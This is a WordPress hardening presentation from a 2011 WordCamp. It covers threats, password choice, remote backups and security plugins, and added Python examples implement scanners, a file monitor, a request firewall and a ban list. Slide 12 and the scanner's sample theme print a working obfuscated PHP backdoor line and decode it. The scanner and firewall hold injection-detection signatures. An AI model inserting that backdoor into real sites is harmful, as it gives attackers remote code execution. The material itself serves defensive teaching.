Securing Your WordPress Website by Vlad Lasky


Vlad is a computer systems engineer with a humorous and educational story to tell about WordPress security. This presentation gives every WordPress site administrator tips on how to harden their site against would-be attackers and avoid inadvertently doing things that could compromise site security.

1 Comment
  • The most recent version of my presentation slides can be found here:

  1. Securing Your WordPress Website. Vladimir Lasky, WordCamp GC 2011
  2. For the Impatient, Lazy and Easily Distracted
     - Rename your admin account
     - Only download plugins and themes hosted on and regularly update them
     - Change your database table prefix from "wp_" to something random using the "WordPress Table Rename" plugin
     - Install the plugin "Semisecure Login Reimagined"
  3. Does This Describe You?
     - Seldom update your WordPress installation and plugins
     - Seldom back up your WordPress installation and plugins
     - Access your WordPress site over public computers and/or Wi-Fi networks
     - Use the same password on multiple websites
     - Download themes and plugins from third-party sites or file sharing networks
     - Rely on cheap developers found through online freelance websites
     - You may be at risk!
  4. How We Achieve Security
     - The only perfect security is to not have a website; anything else is relative
     - Our goals:
       - Make the attacker pick on a weaker target
       - Avoid creating a security hole ourselves
     - Our plan:
       - Use off-the-shelf WordPress plugins where possible and avoid doing anything that breaks compatibility with other plugins or complicates day-to-day activities
  5. The Three Pillars of Security: PREVENTION, DETECTION, RECOVERY
  6. Know Your Enemy
     - Cyber Criminals
     - Cheap Thrill Seekers, AKA "Script Kiddies"
     - Business Rivals
     - Disgruntled Employees
     - Ideological Enemies
  7. What Do Attackers Want to Achieve?
     - Cheap thrills
     - Material for identity theft
     - Damage the reputation of a business
     - Disrupt e-commerce
     - Create a "botnet": a staging point for attacks against a third party
     - Obtain restricted information
     - Black-hat SEO (usually backlink generation)
  8. Characterising Security Threats
     - Active/passive method
     - The aims of the other party
     - Their knowledge of you
     - Their level of motivation
     - The level of difficulty required
     - What their alternative option is
  9. Top Security Threats
     - Brute force password attacks
     - Code injection attacks (SQL/PHP and XSS)
     - Denial of service attacks
     - Sniffing network traffic to recover plaintext passwords and session cookies
     - Malicious code within themes/plugins
  10. Brute Force Password Attack Example
  11. Classic SQL Injection Example
  12. Malicious Code Example
     - The following is a line of obfuscated PHP code in a compromised plugin or theme:

         eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs="));

     - This evaluates as the following PHP statement:

         if(isset($_GET["cmd"]))include $_GET["cmd"];

     - This allows an attacker to run any PHP script on your site by setting the query parameter 'cmd' in the URL.
  13. Good Habits
     - Only obtain free plugins and themes hosted on
     - Buy premium plugins/themes from the author's website, which should list their contact details
     - Update your WordPress installation and plugins regularly
     - When travelling, access the Internet from your own smartphone or notebook computer, not from an Internet cafe
  14. Choosing a Password
     - Twelve characters long as a minimum, and not a dictionary word
     - Common number/letter substitutions are not very useful
     - A good mnemonic technique: come up with a memorable sentence and use the first letter of each word to form the password, e.g.
       - "Jack and Jill went up the hill to fetch a pail of water" could form the 13-character password "JaJwuthtfapow"
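The mnemonic technique and the two checks on this slide (minimum length, and not a dictionary word even after common substitutions) as an added Python example; this is not code from the presentation. The word list is a tiny constructed stand-in for a real cracking dictionary, and the substitution table is an assumption about what crackers try first:

```python
import string
from typing import Iterable, List

# Tiny constructed word list standing in for a real cracking dictionary.
WORDLIST = {"password", "letmein", "welcome", "monkey", "dragon", "sunshine", "wordpress"}

# Substitutions cracking tools try automatically, so they add little strength.
LEET_MAP = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "i", "!": "i",
                          "0": "o", "$": "s", "5": "s", "7": "t"})


def acrostic(sentence: str) -> str:
    """Build a password from the first letter of each word, keeping the sentence's case."""
    return "".join(word[0] for word in sentence.split())


def password_issues(password: str, wordlist: Iterable[str] = WORDLIST,
                    min_length: int = 12) -> List[str]:
    """Return the reasons a password fails the slide's advice (empty list = passes)."""
    words = set(wordlist)
    issues = []
    if len(password) < min_length:
        issues.append(f"shorter than {min_length} characters")
    lowered = password.lower()
    if lowered in words:
        issues.append("is a dictionary word")
    # Strip a trailing "2011" or "!" before the dictionary checks.
    core = lowered.rstrip(string.digits + string.punctuation)
    if core != lowered and core in words:
        issues.append("dictionary word with digits/punctuation appended")
    # Map P@ssw0rd back to password and check again.
    unleeted = core.translate(LEET_MAP)
    if unleeted != core and unleeted in words:
        issues.append("dictionary word with common letter/number substitutions")
    return issues


if __name__ == "__main__":
    candidate = acrostic("Jack and Jill went up the hill to fetch a pail of water")
    print(candidate, password_issues(candidate) or "ok")
    for weak in ("P@ssw0rd", "password2011", "Wordpress!"):
        print(weak, password_issues(weak))
```

The substitution check deliberately runs after the suffix strip, so "P@ssw0rd2011" is still recognised as "password" with decorations rather than as a new word.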
  15. Secure Your Backups
     - Most automated backup plugins operate this way:
       - They archive your database and installation files
       - They upload this archive to a remote site using saved authentication details
     - If your site is compromised, these saved authentication details could be used to destroy your saved backups
     - The solution: Automated Remote Backups
  16. Automated Remote Backups
     - Instead:
       - Use the backup plugin ONLY to archive your database and installation files and place them in a private folder
       - Configure a remote system to periodically connect to your site via SFTP/FTP and download this backup file
     - If a hacker compromises your system, they will not be able to destroy your saved backups
     - Good article on implementing this:
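The pull model from slides 15 and 16 as an added Python example of the remote-side job; it is not from the presentation or any backup plugin. It assumes a hypothetical SSH key, host, user and folder names, that the site-side plugin writes a `.sha256` sidecar next to each archive, and that the archive names carry a sortable date stamp. The key point is where the credentials live: only the remote machine holds them, and its batch contains no `put` or `rm`, so the site can neither reach the backup store nor be used to damage it.

```python
import hashlib
import subprocess
from pathlib import Path
from typing import Iterable, List

# Runs on the REMOTE backup machine, which holds the SSH key. The WordPress
# host only accepts incoming SFTP connections and stores no credentials for
# the backup store, so compromising the site does not expose saved backups.


def sftp_batch(remote_dir: str, local_dir: str) -> str:
    """sftp batch file: fetch-only commands, no put/rm/rename."""
    commands = [
        f"lcd {local_dir}",
        f"cd {remote_dir}",
        "get *.tar.gz",
        "get *.sha256",
        "bye",
    ]
    return "\n".join(commands) + "\n"


def pull_archives(host: str, user: str, key_file: str, remote_dir: str, local_dir: str) -> None:
    """Download the plugin's archives (hypothetical host/user/paths). Needs network access."""
    subprocess.run(
        ["sftp", "-o", "BatchMode=yes", "-i", key_file, "-b", "-", f"{user}@{host}"],
        input=sftp_batch(remote_dir, local_dir),
        text=True,
        check=True,
    )


def checksum_matches(data: bytes, expected_hex: str) -> bool:
    return hashlib.sha256(data).hexdigest() == expected_hex.strip().lower()


def verify_archive(archive: Path) -> bool:
    """Compare the archive with the .sha256 sidecar written by the site-side job."""
    sidecar = archive.parent / (archive.name + ".sha256")
    if not sidecar.exists():
        return False
    parts = sidecar.read_text().split()
    if not parts:
        return False
    return checksum_matches(archive.read_bytes(), parts[0])


def select_for_pruning(names: Iterable[str], keep: int) -> List[str]:
    """Names carry a sortable date stamp; return every archive but the newest `keep`."""
    ordered = sorted(names)
    if keep <= 0:
        return ordered
    return ordered[:-keep]


if __name__ == "__main__":
    local = Path("/var/backups/wordpress")  # hypothetical local store
    pull_archives("wp.example.org", "backup", "/home/backup/.ssh/id_ed25519",
                  "/home/wpuser/private-backups", str(local))
    archives = sorted(local.glob("*.tar.gz"))
    bad = [a.name for a in archives if not verify_archive(a)]
    if bad:
        raise SystemExit(f"checksum mismatch or missing sidecar: {bad}")
    for name in select_for_pruning([a.name for a in archives], keep=7):
        (local / name).unlink()
        (local / (name + ".sha256")).unlink(missing_ok=True)
```

Schedule the script from cron on the backup machine; the "private folder" on the site should itself be outside the web root or blocked from HTTP access, otherwise the archive (and the database dump inside it) is one URL away.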
  17. Plugin: Semisecure Login Reimagined
     - Purpose:
       - Encrypts passwords without requiring SSL; instead it uses JavaScript to encrypt the password
     - Benefits:
       - Simple installation, just activate
       - Eliminates the risk of obtaining the password by sniffing network traffic
     - Limitations:
       - All other traffic is unencrypted; the WordPress session cookie is still vulnerable
  18. Plugin: WordPress HTTPS (SSL)
     - Purpose:
       - All traffic between web browser and blog is encrypted
     - Benefits:
       - Eliminates the risk of password sniffing and session hijacking
     - Limitations:
       - Requires a web host with a shared SSL certificate (HostGator, BlueHost)
       - Alternatively, you must obtain an SSL certificate in the name of your primary domain and get your web host to install it
       - Higher CPU usage on the web server
  19. Plugin: Theme Authenticity Checker
     - Purpose:
       - Scans your theme files for the presence of code that is likely to be malicious
     - Benefit:
       - Rapidly scans theme files without having to look through code manually
     - Limitations:
       - Does not scan plugins
       - Not guaranteed to find all types of malicious code
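A small scanner of the kind this slide describes, as an added Python example that also decodes the obfuscated line from slide 12; it is not Theme Authenticity Checker's code, and its three rules are a constructed sample rather than the plugin's signature set. The sample theme files are constructed and embed the slide 12 payload verbatim so the decode step can be checked:

```python
import base64
import binascii
import re
from pathlib import Path
from typing import Dict, List, Optional

# Constructed rule set covering a few injection idioms. A real checker such as
# Theme Authenticity Checker ships its own, much larger signature list.
RULES = {
    "eval_base64": re.compile(
        r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)"""
    ),
    "include_from_request": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"
    ),
    "eval_from_request": re.compile(r"\beval\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
}

# The obfuscated line from slide 12, embedded in a constructed two-file theme.
INJECTED_LINE = (
    'eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs="));'
)
SAMPLE_THEME = {
    "header.php": "<?php\nwp_head();\n" + INJECTED_LINE + "\n",
    "footer.php": "<?php wp_footer(); ?>\n",
}


def decode_base64_payload(blob: str) -> Optional[str]:
    """Strictly decode the base64 argument; None if it is not valid base64."""
    try:
        raw = base64.b64decode("".join(blob.split()), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def find_suspicious(source: str) -> List[dict]:
    """One finding per rule match; eval(base64_decode(...)) hits carry the decoded text."""
    findings = []
    for rule, pattern in RULES.items():
        for match in pattern.finditer(source):
            finding = {
                "rule": rule,
                "line": source.count("\n", 0, match.start()) + 1,
                "snippet": match.group(0)[:80],
            }
            if rule == "eval_base64":
                decoded = decode_base64_payload(match.group(2))
                finding["decoded"] = decoded
                # Re-scan the decoded text: that is where the real backdoor usually is.
                finding["decoded_rules"] = [
                    r for r, p in RULES.items() if decoded is not None and p.search(decoded)
                ]
            findings.append(finding)
    return findings


def scan_sources(sources: Dict[str, str]) -> Dict[str, List[dict]]:
    """Scan in-memory name -> source pairs; only files with findings are reported."""
    report = {}
    for name, source in sources.items():
        hits = find_suspicious(source)
        if hits:
            report[name] = hits
    return report


def scan_tree(root: str) -> Dict[str, List[dict]]:
    """Scan every .php file under a real theme or plugin directory (hypothetical path)."""
    files = {str(p): p.read_text(errors="replace") for p in Path(root).rglob("*.php")}
    return scan_sources(files)


if __name__ == "__main__":
    for name, hits in scan_sources(SAMPLE_THEME).items():
        for hit in hits:
            print(f"{name}:{hit['line']} {hit['rule']} -> {hit.get('decoded', hit['snippet'])}")
```

Because `scan_tree` takes any directory, the same scanner covers plugins too, which addresses the first limitation on the slide; the second limitation stands, since any fixed rule list misses obfuscation it has not seen.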
  20. Plugin: WordPress File Monitor Plus
     - Purpose:
       - Periodically checks whether any files have been added, changed or deleted in your WordPress installation
     - Benefit:
       - Will detect many types of PHP injection attacks and other forms of intrusion
     - Limitations:
       - Will generate false alarms. You may specify folders to be excluded, but then there is a risk that those could be compromised unknowingly
       - Small chance that a very well-targeted attack could inactivate or sabotage the plugin before it raises the alarm
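The add/change/delete comparison this plugin performs, written out as an added Python example (not the plugin's code). The before/after file sets are constructed; `snapshot_tree` does the same against a real directory. The exclusion handling is there to show the caveat on the slide: excluding `wp-content/uploads` makes a dropped file in it invisible to the check.

```python
import hashlib
import json
from pathlib import Path
from typing import Dict, Iterable


def hash_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def snapshot_files(files: Dict[str, bytes]) -> Dict[str, str]:
    """Relative path -> SHA-256 for an in-memory file set."""
    return {path: hash_bytes(content) for path, content in files.items()}


def snapshot_tree(root: str) -> Dict[str, str]:
    """Same, for a real installation directory (hypothetical path)."""
    base = Path(root)
    return {
        str(p.relative_to(base)).replace("\\", "/"): hash_bytes(p.read_bytes())
        for p in sorted(base.rglob("*"))
        if p.is_file()
    }


def is_excluded(path: str, excludes: Iterable[str]) -> bool:
    """Directory-prefix exclusions, like the plugin's excluded-folders setting."""
    return any(path == e or path.startswith(e.rstrip("/") + "/") for e in excludes)


def compare(baseline: Dict[str, str], current: Dict[str, str],
            excludes: Iterable[str] = ()) -> dict:
    """Report what changed between two snapshots, ignoring excluded folders."""
    excludes = tuple(excludes)
    base = {k: v for k, v in baseline.items() if not is_excluded(k, excludes)}
    cur = {k: v for k, v in current.items() if not is_excluded(k, excludes)}
    return {
        "added": sorted(set(cur) - set(base)),
        "deleted": sorted(set(base) - set(cur)),
        "changed": sorted(k for k in set(base) & set(cur) if base[k] != cur[k]),
    }


def save_baseline(snapshot: Dict[str, str], path: str) -> None:
    # Keep this file off the web host: an attacker who can rewrite it can hide changes,
    # which is the sabotage risk the slide mentions.
    Path(path).write_text(json.dumps(snapshot, indent=1, sort_keys=True))


def load_baseline(path: str) -> Dict[str, str]:
    return json.loads(Path(path).read_text())


# Constructed before/after file sets standing in for a real installation.
CLEAN_FILES = {
    "wp-config.php": b"<?php define('DB_NAME', 'wp');",
    "wp-content/themes/mytheme/header.php": b"<?php wp_head(); ?>",
    "wp-content/uploads/2011/06/photo.jpg": b"\xff\xd8\xff\xe0 fake jpeg",
}
INFECTED_FILES = dict(CLEAN_FILES)
INFECTED_FILES["wp-content/themes/mytheme/header.php"] = b"<?php wp_head(); /* injected line */ ?>"
INFECTED_FILES["wp-content/uploads/dropped.php"] = b"<?php /* file that should not be here */ ?>"


if __name__ == "__main__":
    print(compare(snapshot_files(CLEAN_FILES), snapshot_files(INFECTED_FILES)))
    print(compare(snapshot_files(CLEAN_FILES), snapshot_files(INFECTED_FILES),
                  excludes=["wp-content/uploads"]))
```

A PHP file appearing under `uploads` is itself worth alerting on regardless of exclusions, so a practical monitor excludes by extension within a folder rather than the whole folder.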
  21. Plugin: WordPress Firewall 2
     - Purpose:
       - Monitors web requests and blocks those that seem suspicious
     - Benefit:
       - Will block the majority of SQL and PHP injection attempts
     - Limitations:
       - Small performance overhead on each request
       - On the most aggressive setting, could interfere with some plugins
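Request inspection of the kind this slide describes, as an added Python example that is not WordPress Firewall 2's code; the signature list and the allow-listed parameter names are constructed assumptions. It shows the two things a practitioner most needs to understand about such a filter: parameters must be decoded before matching (including doubly-encoded values), and the "aggressive" trade-off on the slide is modelled as ignoring the allow-list for fields that legitimately carry HTML:

```python
import re
from typing import List
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed signatures for the injection classes named on slide 9; the real
# plugin has its own rule set.
SIGNATURES = {
    "sql_injection": re.compile(r"\b(?:union\s+select|drop\s+table|information_schema)\b", re.I),
    "php_injection": re.compile(r"<\?php|\b(?:base64_decode|eval)\s*\(", re.I),
    "path_traversal": re.compile(r"\.\./"),
    "xss": re.compile(r"<script\b|javascript:", re.I),
}

# Fields that legitimately contain HTML or code-like text in the WordPress admin.
# Dropping this allow-list is what an "aggressive" setting amounts to, and why it
# can break plugins that post rich content.
ALLOWLIST = {"content", "comment", "post_content"}


def normalise(value: str, rounds: int = 2) -> str:
    """Undo up to `rounds` extra layers of URL encoding (%252e -> %2e -> .)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(path_with_query: str, body: str = "", aggressive: bool = False) -> List[dict]:
    """Return signature hits for the query string and form body of one request."""
    parts = urlsplit(path_with_query)
    params = parse_qsl(parts.query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    hits = []
    for name, value in params:
        if not aggressive and name in ALLOWLIST:
            continue
        candidate = normalise(value)
        for signature, pattern in SIGNATURES.items():
            if pattern.search(candidate):
                hits.append({"param": name, "signature": signature})
    return hits


def should_block(path_with_query: str, body: str = "", aggressive: bool = False) -> bool:
    return bool(inspect_request(path_with_query, body, aggressive))


if __name__ == "__main__":
    for url in ("/?p=42", "/?p=1%20UNION%20SELECT%201,2", "/index.php?page=..%2F..%2Fwp-config.php"):
        print(url, inspect_request(url))
    post = "content=%3Cscript%3Ehello%3C%2Fscript%3E&title=Hi"
    print("normal:", inspect_request("/wp-admin/post.php", body=post))
    print("aggressive:", inspect_request("/wp-admin/post.php", body=post, aggressive=True))
```

Every hit is logged with the parameter name and the rule, which is what you need when a false positive does break a plugin: you can see which field tripped which rule rather than just a blocked request.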
  22. Plugin: Useful 404s
     - Purpose:
       - Detects broken links on your website, or broken links on external sites, and sends you an email
     - Benefit:
       - As a side effect, it can also detect attempts to compromise your site, namely where the attacker spoofs the HTTP_REFERER header and attempts to blindly access plugin or theme files that may not exist
     - Limitations:
       - Lots and lots of false alarms
  23. Plugin: Email PHP Errors
     - Purpose:
       - Captures PHP error output and can also generate emails with error reports. Helps detect bugs in plugins or themes, or problems with the web host
     - Benefit:
       - As a side effect, may detect some types of PHP injection attempts or other attempts to exploit code vulnerabilities
       - People often overlook their error logs and let them pile up
     - Limitations:
       - Lots of false alarms
  24. Plugin: WP-Ban
     - Purpose:
       - Ban users by IP, IP range, host name, user agent and referrer URL from visiting your site
     - Benefit:
       - Useful for blocking repeat attacks by the same party
       - Able to reduce the impact of denial of service (DoS) attacks
     - Limitations:
       - Need to determine details of the specific attacker(s)
       - A wise attacker will change their IP addresses frequently
       - Can block innocent people
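The five match criteria on this slide as an added Python example; it is not WP-Ban's code, and the addresses are RFC 5737 documentation ranges in a constructed list. Ranges given as first/last addresses are converted to CIDR blocks with the standard library's `ipaddress` module. The third limitation on the slide is visible in the test: banning 192.0.2.0/24 because of one attacker also blocks 192.0.2.55, who may be innocent.

```python
import ipaddress
from typing import Iterable, Optional, Tuple


class BanList:
    """Match a visitor against banned IPs, ranges, host names, user agents and referrers."""

    def __init__(self, ips: Iterable[str] = (), networks: Iterable[str] = (),
                 ranges: Iterable[Tuple[str, str]] = (), hostnames: Iterable[str] = (),
                 user_agents: Iterable[str] = (), referrers: Iterable[str] = ()):
        self.ips = {ipaddress.ip_address(ip) for ip in ips}
        self.networks = [ipaddress.ip_network(net, strict=False) for net in networks]
        # A first-last range becomes the minimal set of CIDR blocks covering it.
        for first, last in ranges:
            self.networks.extend(ipaddress.summarize_address_range(
                ipaddress.ip_address(first), ipaddress.ip_address(last)))
        # Host names match as a suffix (crawler.example.net matches example.net);
        # user agents and referrers match as case-insensitive substrings.
        self.hostnames = tuple(h.lower() for h in hostnames)
        self.user_agents = tuple(ua.lower() for ua in user_agents)
        self.referrers = tuple(r.lower() for r in referrers)

    def reason(self, ip: str, hostname: str = "", user_agent: str = "",
               referrer: str = "") -> Optional[str]:
        """Return why the visitor is banned, or None if they are allowed."""
        addr = ipaddress.ip_address(ip)
        if addr in self.ips:
            return f"ip {addr}"
        for net in self.networks:
            if addr in net:
                return f"range {net}"
        host = hostname.lower()
        for suffix in self.hostnames:
            if host == suffix or host.endswith("." + suffix):
                return f"host {suffix}"
        ua = user_agent.lower()
        for needle in self.user_agents:
            if needle in ua:
                return f"user-agent {needle}"
        ref = referrer.lower()
        for needle in self.referrers:
            if needle in ref:
                return f"referrer {needle}"
        return None

    def is_banned(self, ip: str, **context: str) -> bool:
        return self.reason(ip, **context) is not None


# Constructed list using RFC 5737 documentation addresses.
EXAMPLE = BanList(
    ips=["203.0.113.7"],
    networks=["192.0.2.0/24"],
    ranges=[("198.51.100.10", "198.51.100.20")],
    hostnames=["example.net"],
    user_agents=["badbot"],
    referrers=["spam.example"],
)


if __name__ == "__main__":
    for visitor in ("203.0.113.7", "192.0.2.55", "198.51.100.15", "198.51.100.21"):
        print(visitor, EXAMPLE.reason(visitor))
    print(EXAMPLE.reason("203.0.113.8", user_agent="Mozilla/5.0 BadBot/2.1"))
```

Host name and user agent checks only work if you resolve and log those values, and both are under the visitor's control, so IP-based entries remain the ones that actually cost an attacker something.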
  25. Conclusion
     - WordPress Codex - Hardening WordPress
       - Various tips for site administrators to improve your site's security
     - WordPress Codex - Data Validation
       - A must for developers: describes all the facilities available in WordPress to validate data, preventing your code from being vulnerable to code injection exploits
     - Questions and Comments: